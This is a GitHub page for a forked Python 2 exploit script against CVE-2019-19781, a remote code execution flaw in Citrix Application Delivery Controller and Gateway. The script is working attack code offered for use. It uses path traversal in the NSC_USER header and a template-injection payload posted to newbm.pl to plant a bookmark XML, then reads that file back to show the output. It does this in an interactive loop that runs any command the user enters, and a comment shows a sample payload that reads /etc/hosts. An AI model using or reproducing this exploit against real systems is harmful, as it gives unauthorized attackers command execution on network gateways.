forked from jas502n/CVE-2019-19781
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2019-19781.py
94 lines (71 loc) · 3.05 KB
/
CVE-2019-19781.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
#coding=utf-8
import requests,sys,uuid
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
'''
<?xml version="1.0" encoding="UTF-8"?>
<user username="../../../netscaler/portal/templates/cdl">
<bookmarks>
<bookmark UI_inuse="" descr="[% template.new('BLOCK' = 'print `cat /etc/hosts`') %]" title="cdl" url="http://example.com" />
</bookmarks>
<escbk>
</escbk>
<filesystems></filesystems>
<style></style>
</user>
'''
banner = '''
_____ _ _ _____ _____ _____ __ _____ __ _____ ___________ __
/ __ \ | | | ___| / __ \| _ |/ | | _ | / | | _ ||___ / _ |/ |
| / \/ | | | |__ ______`' / /'| |/' |`| | | |_| |______`| | | |_| | / / \ V / `| |
| | | | | | __|______| / / | /| | | | \____ |______|| | \____ | / / / _ \ | |
| \__/\ \_/ / |___ ./ /___\ |_/ /_| |_.___/ / _| |_.___/ /./ / | |_| |_| |_
\____/\___/\____/ \_____/ \___/ \___/\____/ \___/\____/ \_/ \_____/\___/
Remote Code Execute in Citrix Application Delivery Controller and Citrix Gateway
Usage: python CVE-2019-19781.py http://x.x.x.x/
Python By Jas502n
'''
print banner
def upload_xml(url,cdl,cmd):
newbm_url = url + '/vpn/../vpns/portal/scripts/newbm.pl'
headers = {
"Connection": "close",
"NSC_USER": "../../../netscaler/portal/templates/%s"%cdl,
"NSC_NONCE": "nsroot"
}
payload = "url=http://example.com&title=" + cdl + "&desc=[% template.new('BLOCK' = 'print `"+ cmd + "`') %]"
proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
r = requests.post(url=newbm_url, headers=headers,data=payload,proxies=proxies, verify=False,allow_redirects=False)
# print r.content
if r.status_code == 200 and 'parent.window.ns_reload' in r.content:
print "\n","[+] Upload_Xml= ",newbm_url
print '[+] Upload successful!\n'
xml_url(url,cdl,cmd)
else:
sys.exit("[+] Upload Fail!")
def xml_url(url,cdl,cmd):
xml_url = url + '/vpn/../vpns/portal/%s.xml' % cdl
headers = {
"NSC_USER": "nsroot",
"NSC_NONCE": "nsroot"
}
proxies = {"http":"127.0.0.1:8080","https":"127.0.0.1:8080"}
r = requests.get(xml_url,headers=headers, verify=False,proxies=proxies)
# print r.headers()
if r.status_code == 200:
print "[+] Xml_Url= ",xml_url
print "[+] Command= ",cmd
print "[+] Exec Result: \n____________________________________________________________\n\n %s____________________________________________________________\n" % r.content.split("u")[0]
if __name__ == '__main__':
if len(sys.argv) != 2:
sys.exit("python %s http://x.x.x.x/" % sys.argv[0])
else:
while 1:
url = sys.argv[1]
cdl = str(uuid.uuid4()).split('-')[0]
cmd = raw_input("Set Cmd > ")
if cmd =='exit':
exit()
print 1
else:
upload_xml(url,cdl,cmd)